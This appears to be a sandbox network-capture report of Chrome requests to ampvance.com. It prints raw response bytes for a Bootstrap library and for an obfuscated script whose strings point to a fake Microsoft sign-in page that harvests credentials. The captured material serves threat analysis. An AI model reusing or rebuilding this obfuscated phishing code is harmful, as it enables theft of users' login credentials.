                                                      2024-03-05 13:25:02 UTC1369INData Raw: 6e 20 65 26 26 69 28 74 2e 70 72 6f 74 6f 74 79 70 65 2c 65 29 2c 6e 26 26 69 28 74 2c 6e 29 2c 74 7d 66 75 6e 63 74 69 6f 6e 20 6c 28 72 29 7b 66 6f 72 28 76 61 72 20 74 3d 31 3b 74 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 74 2b 2b 29 7b 76 61 72 20 6f 3d 6e 75 6c 6c 21 3d 61 72 67 75 6d 65 6e 74 73 5b 74 5d 3f 61 72 67 75 6d 65 6e 74 73 5b 74 5d 3a 7b 7d 2c 65 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 6f 29 3b 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 26 26 28 65 3d 65 2e 63 6f 6e 63 61 74 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 6f 29 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72
                                                      Data Ascii: n e&&i(t.prototype,e),n&&i(t,n),t}function l(r){for(var t=1;t<arguments.length;t++){var o=null!=arguments[t]?arguments[t]:{},e=Object.keys(o);"function"==typeof Object.getOwnPropertySymbols&&(e=e.concat(Object.getOwnPropertySymbols(o).filter(function(t){r
                                                      2024-03-05 13:25:02 UTC1369INData Raw: 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 74 29 3b 29 3b 72 65 74 75 72 6e 20 74 7d 2c 67 65 74 53 65 6c 65 63 74 6f 72 46 72 6f 6d 45 6c 65 6d 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 74 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 64 61 74 61 2d 74 61 72 67 65 74 22 29 3b 65 26 26 22 23 22 21 3d 3d 65 7c 7c 28 65 3d 74 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 68 72 65 66 22 29 7c 7c 22 22 29 3b 74 72 79 7b 72 65 74 75 72 6e 20 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 65 29 3f 65 3a 6e 75 6c 6c 7d 63 61 74 63 68 28 74 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 7d 7d 2c 67 65 74 54 72 61 6e 73 69 74 69 6f 6e 44 75 72 61 74 69 6f 6e 46 72 6f 6d 45 6c 65 6d 65 6e 74 3a 66 75 6e 63 74
                                                      Data Ascii: ument.getElementById(t););return t},getSelectorFromElement:function(t){var e=t.getAttribute("data-target");e&&"#"!==e||(e=t.getAttribute("href")||"");try{return document.querySelector(e)?e:null}catch(t){return null}},getTransitionDurationFromElement:funct
                                                      2024-03-05 13:25:02 UTC1369INData Raw: 65 3d 74 68 69 73 2e 5f 67 65 74 52 6f 6f 74 45 6c 65 6d 65 6e 74 28 74 29 29 2c 74 68 69 73 2e 5f 74 72 69 67 67 65 72 43 6c 6f 73 65 45 76 65 6e 74 28 65 29 2e 69 73 44 65 66 61 75 6c 74 50 72 65 76 65 6e 74 65 64 28 29 7c 7c 74 68 69 73 2e 5f 72 65 6d 6f 76 65 45 6c 65 6d 65 6e 74 28 65 29 7d 2c 74 2e 64 69 73 70 6f 73 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 2e 72 65 6d 6f 76 65 44 61 74 61 28 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 2c 6f 29 2c 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 3d 6e 75 6c 6c 7d 2c 74 2e 5f 67 65 74 52 6f 6f 74 45 6c 65 6d 65 6e 74 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 46 6e 2e 67 65 74 53 65 6c 65 63 74 6f 72 46 72 6f 6d 45 6c 65 6d 65 6e 74 28 74 29 2c 6e 3d 21 31 3b 72 65 74 75 72 6e 20 65 26 26 28 6e 3d 64
                                                      Data Ascii: e=this._getRootElement(t)),this._triggerCloseEvent(e).isDefaultPrevented()||this._removeElement(e)},t.dispose=function(){r.removeData(this._element,o),this._element=null},t._getRootElement=function(t){var e=Fn.getSelectorFromElement(t),n=!1;return e&&(n=d
                                                      2024-03-05 13:25:02 UTC1369INData Raw: 69 76 65 22 2c 4e 3d 22 2e 62 74 6e 22 2c 4f 3d 7b 43 4c 49 43 4b 5f 44 41 54 41 5f 41 50 49 3a 22 63 6c 69 63 6b 22 2b 79 2b 45 2c 46 4f 43 55 53 5f 42 4c 55 52 5f 44 41 54 41 5f 41 50 49 3a 28 53 3d 22 66 6f 63 75 73 22 29 2b 79 2b 45 2b 22 20 62 6c 75 72 22 2b 79 2b 45 7d 2c 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 6e 28 74 29 7b 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 3d 74 7d 76 61 72 20 74 3d 6e 2e 70 72 6f 74 6f 74 79 70 65 3b 72 65 74 75 72 6e 20 74 2e 74 6f 67 67 6c 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 21 30 2c 65 3d 21 30 2c 6e 3d 6d 28 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 29 2e 63 6c 6f 73 65 73 74 28 41 29 5b 30 5d 3b 69 66 28 6e 29 7b 76 61 72 20 69 3d 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 2e 71
                                                      Data Ascii: ive",N=".btn",O={CLICK_DATA_API:"click"+y+E,FOCUS_BLUR_DATA_API:(S="focus")+y+E+" blur"+y+E},k=function(){function n(t){this._element=t}var t=n.prototype;return t.toggle=function(){var t=!0,e=!0,n=m(this._element).closest(A)[0];if(n){var i=this._element.q
                                                      2024-03-05 13:25:02 UTC1369INData Raw: 69 63 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6d 2e 66 6e 5b 70 5d 3d 43 2c 6b 2e 5f 6a 51 75 65 72 79 49 6e 74 65 72 66 61 63 65 7d 2c 6b 29 2c 51 6e 3d 28 6a 3d 22 63 61 72 6f 75 73 65 6c 22 2c 4c 3d 22 2e 22 2b 28 48 3d 22 62 73 2e 63 61 72 6f 75 73 65 6c 22 29 2c 52 3d 22 2e 64 61 74 61 2d 61 70 69 22 2c 78 3d 28 50 3d 65 29 2e 66 6e 5b 6a 5d 2c 57 3d 7b 69 6e 74 65 72 76 61 6c 3a 35 65 33 2c 6b 65 79 62 6f 61 72 64 3a 21 30 2c 73 6c 69 64 65 3a 21 31 2c 70 61 75 73 65 3a 22 68 6f 76 65 72 22 2c 77 72 61 70 3a 21 30 7d 2c 55 3d 7b 69 6e 74 65 72 76 61 6c 3a 22 28 6e 75 6d 62 65 72 7c 62 6f 6f 6c 65 61 6e 29 22 2c 6b 65 79 62 6f 61 72 64 3a 22 62 6f 6f 6c 65 61 6e 22 2c 73 6c 69 64 65 3a 22 28 62 6f 6f 6c 65 61 6e 7c 73 74 72 69 6e
                                                      Data Ascii: ict=function(){return m.fn[p]=C,k._jQueryInterface},k),Qn=(j="carousel",L="."+(H="bs.carousel"),R=".data-api",x=(P=e).fn[j],W={interval:5e3,keyboard:!0,slide:!1,pause:"hover",wrap:!0},U={interval:"(number|boolean)",keyboard:"boolean",slide:"(boolean|strin
                                                      2024-03-05 13:25:02 UTC1369INData Raw: 69 64 69 6e 67 7c 7c 74 68 69 73 2e 5f 73 6c 69 64 65 28 46 29 7d 2c 74 2e 70 61 75 73 65 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 74 7c 7c 28 74 68 69 73 2e 5f 69 73 50 61 75 73 65 64 3d 21 30 29 2c 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 65 74 29 26 26 28 46 6e 2e 74 72 69 67 67 65 72 54 72 61 6e 73 69 74 69 6f 6e 45 6e 64 28 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 29 2c 74 68 69 73 2e 63 79 63 6c 65 28 21 30 29 29 2c 63 6c 65 61 72 49 6e 74 65 72 76 61 6c 28 74 68 69 73 2e 5f 69 6e 74 65 72 76 61 6c 29 2c 74 68 69 73 2e 5f 69 6e 74 65 72 76 61 6c 3d 6e 75 6c 6c 7d 2c 74 2e 63 79 63 6c 65 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 74 7c 7c 28 74 68 69 73 2e 5f 69 73 50 61 75 73 65 64 3d 21 31 29 2c 74 68 69 73 2e 5f
                                                      Data Ascii: iding||this._slide(F)},t.pause=function(t){t||(this._isPaused=!0),this._element.querySelector(et)&&(Fn.triggerTransitionEnd(this._element),this.cycle(!0)),clearInterval(this._interval),this._interval=null},t.cycle=function(t){t||(this._isPaused=!1),this._
                                                      2024-03-05 13:25:02 UTC1369INData Raw: 56 45 2c 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 65 2e 63 79 63 6c 65 28 74 29 7d 29 2c 22 6f 6e 74 6f 75 63 68 73 74 61 72 74 22 69 6e 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 26 26 50 28 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 29 2e 6f 6e 28 51 2e 54 4f 55 43 48 45 4e 44 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 65 2e 70 61 75 73 65 28 29 2c 65 2e 74 6f 75 63 68 54 69 6d 65 6f 75 74 26 26 63 6c 65 61 72 54 69 6d 65 6f 75 74 28 65 2e 74 6f 75 63 68 54 69 6d 65 6f 75 74 29 2c 65 2e 74 6f 75 63 68 54 69 6d 65 6f 75 74 3d 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 65 2e 63 79 63 6c 65 28 74 29 7d 2c 35 30 30 2b 65 2e 5f 63 6f 6e 66 69 67 2e 69 6e 74 65 72 76 61 6c 29
                                                      Data Ascii: VE,function(t){return e.cycle(t)}),"ontouchstart"in document.documentElement&&P(this._element).on(Q.TOUCHEND,function(){e.pause(),e.touchTimeout&&clearTimeout(e.touchTimeout),e.touchTimeout=setTimeout(function(t){return e.cycle(t)},500+e._config.interval)
                                                      2024-03-05 13:25:02 UTC1369INData Raw: 65 6d 49 6e 64 65 78 28 73 29 2c 6c 3d 65 7c 7c 73 26 26 74 68 69 73 2e 5f 67 65 74 49 74 65 6d 42 79 44 69 72 65 63 74 69 6f 6e 28 74 2c 73 29 2c 63 3d 74 68 69 73 2e 5f 67 65 74 49 74 65 6d 49 6e 64 65 78 28 6c 29 2c 68 3d 42 6f 6f 6c 65 61 6e 28 74 68 69 73 2e 5f 69 6e 74 65 72 76 61 6c 29 3b 69 66 28 74 3d 3d 3d 71 3f 28 6e 3d 4a 2c 69 3d 5a 2c 72 3d 4b 29 3a 28 6e 3d 7a 2c 69 3d 47 2c 72 3d 4d 29 2c 6c 26 26 50 28 6c 29 2e 68 61 73 43 6c 61 73 73 28 56 29 29 74 68 69 73 2e 5f 69 73 53 6c 69 64 69 6e 67 3d 21 31 3b 65 6c 73 65 20 69 66 28 21 74 68 69 73 2e 5f 74 72 69 67 67 65 72 53 6c 69 64 65 45 76 65 6e 74 28 6c 2c 72 29 2e 69 73 44 65 66 61 75 6c 74 50 72 65 76 65 6e 74 65 64 28 29 26 26 73 26 26 6c 29 7b 74 68 69 73 2e 5f 69 73 53 6c 69 64 69 6e
                                                      Data Ascii: emIndex(s),l=e||s&&this._getItemByDirection(t,s),c=this._getItemIndex(l),h=Boolean(this._interval);if(t===q?(n=J,i=Z,r=K):(n=z,i=G,r=M),l&&P(l).hasClass(V))this._isSliding=!1;else if(!this._triggerSlideEvent(l,r).isDefaultPrevented()&&s&&l){this._isSlidin
                                                      2024-03-05 13:25:02 UTC1369INData Raw: 28 74 68 69 73 29 2e 64 61 74 61 28 29 29 2c 72 3d 74 68 69 73 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 64 61 74 61 2d 73 6c 69 64 65 2d 74 6f 22 29 3b 72 26 26 28 69 2e 69 6e 74 65 72 76 61 6c 3d 21 31 29 2c 6f 2e 5f 6a 51 75 65 72 79 49 6e 74 65 72 66 61 63 65 2e 63 61 6c 6c 28 50 28 6e 29 2c 69 29 2c 72 26 26 50 28 6e 29 2e 64 61 74 61 28 48 29 2e 74 6f 28 72 29 2c 74 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 7d 7d 7d 2c 73 28 6f 2c 6e 75 6c 6c 2c 5b 7b 6b 65 79 3a 22 56 45 52 53 49 4f 4e 22 2c 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 22 34 2e 31 2e 33 22 7d 7d 2c 7b 6b 65 79 3a 22 44 65 66 61 75 6c 74 22 2c 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 57 7d 7d 5d 29 2c 6f 7d 28 29 2c 50 28 64 6f
                                                      Data Ascii: (this).data()),r=this.getAttribute("data-slide-to");r&&(i.interval=!1),o._jQueryInterface.call(P(n),i),r&&P(n).data(H).to(r),t.preventDefault()}}},s(o,null,[{key:"VERSION",get:function(){return"4.1.3"}},{key:"Default",get:function(){return W}}]),o}(),P(do


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      33192.168.2.549752104.21.81.2294433472C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-03-05 13:25:02 UTC1138OUTGET /js/3485ef1ed169dedf7c7dc623777c6a8065e71d2e3a2c1 HTTP/1.1
                                                      Host: ampvance.com
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      sec-ch-ua-arch: "x86"
                                                      sec-ch-ua-full-version: "117.0.5938.132"
                                                      sec-ch-ua-platform-version: "10.0.0"
                                                      sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"
                                                      sec-ch-ua-bitness: "64"
                                                      sec-ch-ua-model: ""
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: */*
                                                      Sec-Fetch-Site: same-origin
                                                      Sec-Fetch-Mode: no-cors
                                                      Sec-Fetch-Dest: script
                                                      Referer: https://ampvance.com/cf7e4164f8225f1bd6b9a33751f5f9ed65e71d2da84d3LOGcf7e4164f8225f1bd6b9a33751f5f9ed65e71d2da84d4
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cookie: cf_clearance=9ukY5ydoUPWFViqUC.G2Zau9oL4gAKunoKgXLN6qDgI-1709645074-1.0.1.1-puuwhjhkEypTXzvnBM1g5Iqmc8RGMwSRmclBcSbSok6Kg9HC2riMGTLYdtgq.1NerTlIrY3RuGM9E7wADehI8Q; PHPSESSID=e09506325d449b6bfb209b4fdc8c5b59
                                                      2024-03-05 13:25:02 UTC663INHTTP/1.1 200 OK
                                                      Date: Tue, 05 Mar 2024 13:25:02 GMT
                                                      Content-Type: text/javascript
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      last-modified: Tue, 05 Mar 2024 10:40:37 GMT
                                                      vary: Accept-Encoding
                                                      x-turbo-charged-by: LiteSpeed
                                                      CF-Cache-Status: DYNAMIC
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=GC4je0GpESb27hpoaZFKJ8tmaWCDfEVRXOvjANuo2ktW5nyzsRV%2F29Lqtd7AdAM9mr110l38W%2F6vWCItEPoIxFUfB8Dr%2BoL%2BtVCi2ugqiwaOC1JXkOhphKjcLzo7raY%3D"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      CF-RAY: 85fa6e041de943dc-EWR
                                                      alt-svc: h3=":443"; ma=86400
                                                      2024-03-05 13:25:02 UTC706INData Raw: 31 62 38 33 0d 0a 76 61 72 20 5f 30 78 32 32 64 35 62 34 3d 5f 30 78 65 39 33 36 3b 66 75 6e 63 74 69 6f 6e 20 5f 30 78 65 39 33 36 28 5f 30 78 31 31 30 64 30 66 2c 5f 30 78 32 62 39 31 61 39 29 7b 76 61 72 20 5f 30 78 35 61 66 63 32 39 3d 5f 30 78 32 65 38 39 28 29 3b 72 65 74 75 72 6e 20 5f 30 78 65 39 33 36 3d 66 75 6e 63 74 69 6f 6e 28 5f 30 78 35 65 38 30 33 34 2c 5f 30 78 31 36 34 39 61 66 29 7b 5f 30 78 35 65 38 30 33 34 3d 5f 30 78 35 65 38 30 33 34 2d 30 78 31 32 64 3b 76 61 72 20 5f 30 78 34 31 62 66 65 38 3d 5f 30 78 35 61 66 63 32 39 5b 5f 30 78 35 65 38 30 33 34 5d 3b 72 65 74 75 72 6e 20 5f 30 78 34 31 62 66 65 38 3b 7d 2c 5f 30 78 65 39 33 36 28 5f 30 78 31 31 30 64 30 66 2c 5f 30 78 32 62 39 31 61 39 29 3b 7d 28 66 75 6e 63 74 69 6f 6e 28
                                                      Data Ascii: 1b83var _0x22d5b4=_0xe936;function _0xe936(_0x110d0f,_0x2b91a9){var _0x5afc29=_0x2e89();return _0xe936=function(_0x5e8034,_0x1649af){_0x5e8034=_0x5e8034-0x12d;var _0x41bfe8=_0x5afc29[_0x5e8034];return _0x41bfe8;},_0xe936(_0x110d0f,_0x2b91a9);}(function(
                                                      2024-03-05 13:25:02 UTC1369INData Raw: 38 39 2c 30 78 36 32 62 30 31 29 29 3b 66 75 6e 63 74 69 6f 6e 20 5f 30 78 32 65 38 39 28 29 7b 76 61 72 20 5f 30 78 33 35 37 34 33 62 3d 5b 27 6c 6f 67 27 2c 27 75 6e 64 65 72 27 2c 27 70 72 6f 74 6f 74 79 70 65 27 2c 27 75 73 65 72 6e 61 6d 65 45 72 72 6f 72 27 2c 27 64 69 73 61 62 6c 65 64 27 2c 27 73 65 61 72 63 68 27 2c 27 70 72 6f 67 72 65 73 73 42 61 72 27 2c 27 72 65 6d 6f 76 65 43 6c 61 73 73 27 2c 27 3c 62 72 2f 3e 27 2c 27 65 61 63 68 27 2c 27 6a 73 6f 6e 27 2c 27 74 72 61 63 65 27 2c 27 73 74 79 6c 65 27 2c 27 71 75 65 72 79 53 65 6c 65 63 74 6f 72 27 2c 27 6f 70 61 63 69 74 79 27 2c 27 6e 6f 6e 65 27 2c 27 69 30 31 31 36 27 2c 27 76 61 6c 75 65 27 2c 27 6c 6f 63 61 74 69 6f 6e 27 2c 27 72 65 6d 6f 76 65 41 74 74 72 27 2c 27 72 65 73 65 74 27
                                                      Data Ascii: 89,0x62b01));function _0x2e89(){var _0x35743b=['log','under','prototype','usernameError','disabled','search','progressBar','removeClass','<br/>','each','json','trace','style','querySelector','opacity','none','i0116','value','location','removeAttr','reset'
                                                      2024-03-05 13:25:02 UTC1369INData Raw: 61 66 29 7b 76 61 72 20 5f 30 78 33 39 30 31 65 35 3d 5f 30 78 31 31 32 64 61 66 5b 5f 30 78 31 32 66 34 64 38 28 30 78 31 35 38 29 5d 28 5f 30 78 32 38 31 64 34 34 2c 61 72 67 75 6d 65 6e 74 73 29 3b 72 65 74 75 72 6e 20 5f 30 78 31 31 32 64 61 66 3d 6e 75 6c 6c 2c 5f 30 78 33 39 30 31 65 35 3b 7d 7d 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 3b 72 65 74 75 72 6e 20 5f 30 78 32 62 38 37 64 62 3d 21 5b 5d 2c 5f 30 78 33 63 66 65 63 39 3b 7d 3b 7d 28 29 29 2c 5f 30 78 34 62 39 62 61 35 3d 5f 30 78 64 62 31 63 65 63 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 5f 30 78 34 38 38 32 35 33 3d 5f 30 78 65 39 33 36 3b 72 65 74 75 72 6e 20 5f 30 78 34 62 39 62 61 35 5b 5f 30 78 34 38 38 32 35 33 28 30 78 31 33 31 29 5d 28 29 5b 5f 30 78 34 38 38 32
                                                      Data Ascii: af){var _0x3901e5=_0x112daf[_0x12f4d8(0x158)](_0x281d44,arguments);return _0x112daf=null,_0x3901e5;}}:function(){};return _0x2b87db=![],_0x3cfec9;};}()),_0x4b9ba5=_0xdb1cec(this,function(){var _0x488253=_0xe936;return _0x4b9ba5[_0x488253(0x131)]()[_0x4882
                                                      2024-03-05 13:25:02 UTC1369INData Raw: 61 65 62 32 61 3b 5f 30 78 33 61 65 62 32 61 5b 5f 30 78 33 39 34 37 66 36 28 30 78 31 33 38 29 5d 3d 5f 30 78 31 36 34 39 61 66 5b 5f 30 78 33 39 34 37 66 36 28 30 78 31 35 66 29 5d 28 5f 30 78 31 36 34 39 61 66 29 2c 5f 30 78 33 61 65 62 32 61 5b 5f 30 78 33 39 34 37 66 36 28 30 78 31 33 31 29 5d 3d 5f 30 78 34 31 65 35 39 30 5b 5f 30 78 33 39 34 37 66 36 28 30 78 31 33 31 29 5d 5b 5f 30 78 33 39 34 37 66 36 28 30 78 31 35 66 29 5d 28 5f 30 78 34 31 65 35 39 30 29 2c 5f 30 78 35 31 36 64 37 64 5b 5f 30 78 31 63 64 66 39 31 5d 3d 5f 30 78 33 61 65 62 32 61 3b 7d 7d 29 3b 5f 30 78 35 65 38 30 33 34 28 29 3b 66 75 6e 63 74 69 6f 6e 20 73 6c 65 65 70 28 5f 30 78 34 31 35 62 63 31 29 7b 76 61 72 20 5f 30 78 31 35 35 30 61 33 3d 5f 30 78 65 39 33 36 3b 63 6f
                                                      Data Ascii: aeb2a;_0x3aeb2a[_0x3947f6(0x138)]=_0x1649af[_0x3947f6(0x15f)](_0x1649af),_0x3aeb2a[_0x3947f6(0x131)]=_0x41e590[_0x3947f6(0x131)][_0x3947f6(0x15f)](_0x41e590),_0x516d7d[_0x1cdf91]=_0x3aeb2a;}});_0x5e8034();function sleep(_0x415bc1){var _0x1550a3=_0xe936;co
                                                      2024-03-05 13:25:02 UTC1369INData Raw: 34 36 29 5d 28 5f 30 78 33 36 37 63 62 35 28 30 78 31 35 32 29 29 2c 5f 30 78 34 62 39 38 35 63 3d 64 6f 63 75 6d 65 6e 74 5b 5f 30 78 33 36 37 63 62 35 28 30 78 31 34 36 29 5d 28 5f 30 78 33 36 37 63 62 35 28 30 78 31 33 33 29 29 3b 70 72 6f 67 3d 64 6f 63 75 6d 65 6e 74 5b 5f 30 78 33 36 37 63 62 35 28 30 78 31 37 31 29 5d 28 5f 30 78 33 36 37 63 62 35 28 30 78 31 33 66 29 29 2c 70 72 6f 67 5b 5f 30 78 33 36 37 63 62 35 28 30 78 31 36 36 29 5d 28 5f 30 78 33 36 37 63 62 35 28 30 78 31 36 35 29 29 2c 5f 30 78 32 36 31 31 38 32 5b 5f 30 78 33 36 37 63 62 35 28 30 78 31 34 35 29 5d 5b 5f 30 78 33 36 37 63 62 35 28 30 78 31 33 30 29 5d 3d 27 31 30 27 2c 5f 30 78 32 36 31 31 38 32 5b 5f 30 78 33 36 37 63 62 35 28 30 78 31 34 35 29 5d 5b 5f 30 78 33 36 37 63
                                                      Data Ascii: 46)](_0x367cb5(0x152)),_0x4b985c=document[_0x367cb5(0x146)](_0x367cb5(0x133));prog=document[_0x367cb5(0x171)](_0x367cb5(0x13f)),prog[_0x367cb5(0x166)](_0x367cb5(0x165)),_0x261182[_0x367cb5(0x145)][_0x367cb5(0x130)]='10',_0x261182[_0x367cb5(0x145)][_0x367c
                                                      2024-03-05 13:25:02 UTC869INData Raw: 78 32 35 38 65 31 62 28 30 78 31 35 39 29 5d 2c 66 75 6e 63 74 69 6f 6e 28 5f 30 78 31 33 31 39 33 33 2c 5f 30 78 31 36 32 34 34 63 29 7b 76 61 72 20 5f 30 78 32 36 38 33 34 38 3d 5f 30 78 32 35 38 65 31 62 3b 5f 30 78 32 62 65 64 39 37 2b 3d 27 27 2b 5f 30 78 31 36 32 34 34 63 5b 30 78 30 5d 2b 5f 30 78 32 36 38 33 34 38 28 30 78 31 34 31 29 3b 7d 29 3b 7d 65 6c 73 65 7b 69 66 28 5f 30 78 33 35 64 31 35 32 5b 5f 30 78 32 35 38 65 31 62 28 30 78 31 36 34 29 5d 3d 3d 30 78 31 61 33 29 6c 6f 63 61 74 69 6f 6e 5b 5f 30 78 32 35 38 65 31 62 28 30 78 31 35 31 29 5d 28 29 3b 65 6c 73 65 7b 7d 7d 7d 2c 27 63 6f 6d 70 6c 65 74 65 27 3a 66 75 6e 63 74 69 6f 6e 28 5f 30 78 32 35 64 63 37 34 29 7b 76 61 72 20 5f 30 78 31 65 38 63 64 35 3d 5f 30 78 33 36 37 63 62 35
                                                      Data Ascii: x258e1b(0x159)],function(_0x131933,_0x16244c){var _0x268348=_0x258e1b;_0x2bed97+=''+_0x16244c[0x0]+_0x268348(0x141);});}else{if(_0x35d152[_0x258e1b(0x164)]==0x1a3)location[_0x258e1b(0x151)]();else{}}},'complete':function(_0x25dc74){var _0x1e8cd5=_0x367cb5
                                                      2024-03-05 13:25:02 UTC5INData Raw: 30 0d 0a 0d 0a
                                                      Data Ascii: 0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      34192.168.2.549754104.21.81.2294433472C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-03-05 13:25:03 UTC1087OUTGET /1 HTTP/1.1
                                                      Host: ampvance.com
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      sec-ch-ua-arch: "x86"
                                                      sec-ch-ua-full-version: "117.0.5938.132"
                                                      sec-ch-ua-platform-version: "10.0.0"
                                                      sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"
                                                      sec-ch-ua-bitness: "64"
                                                      sec-ch-ua-model: ""
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: */*
                                                      Sec-Fetch-Site: same-origin
                                                      Sec-Fetch-Mode: cors
                                                      Sec-Fetch-Dest: empty
                                                      Referer: https://ampvance.com/cf7e4164f8225f1bd6b9a33751f5f9ed65e71d2da84d3LOGcf7e4164f8225f1bd6b9a33751f5f9ed65e71d2da84d4
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cookie: cf_clearance=9ukY5ydoUPWFViqUC.G2Zau9oL4gAKunoKgXLN6qDgI-1709645074-1.0.1.1-puuwhjhkEypTXzvnBM1g5Iqmc8RGMwSRmclBcSbSok6Kg9HC2riMGTLYdtgq.1NerTlIrY3RuGM9E7wADehI8Q; PHPSESSID=e09506325d449b6bfb209b4fdc8c5b59
                                                      2024-03-05 13:25:03 UTC740INHTTP/1.1 200 OK
                                                      Date: Tue, 05 Mar 2024 13:25:03 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                      cache-control: no-store, no-cache, must-revalidate
                                                      pragma: no-cache
                                                      vary: Accept-Encoding
                                                      x-turbo-charged-by: LiteSpeed
                                                      CF-Cache-Status: DYNAMIC
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Put%2F%2Fr4I2R2GBvc%2BR5cO8Gcv5bRiv82PLoXEW5NVce4n2MWDYli67%2BXAxxdQwO1snC5j71m8gLeEsPu%2B8nmp%2FAVFOSkh42zSIVsIWc4EbL1syzR6AUzILRPwjJrfIW8%3D"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      CF-RAY: 85fa6e087b6143ca-EWR
                                                      alt-svc: h3=":443"; ma=86400
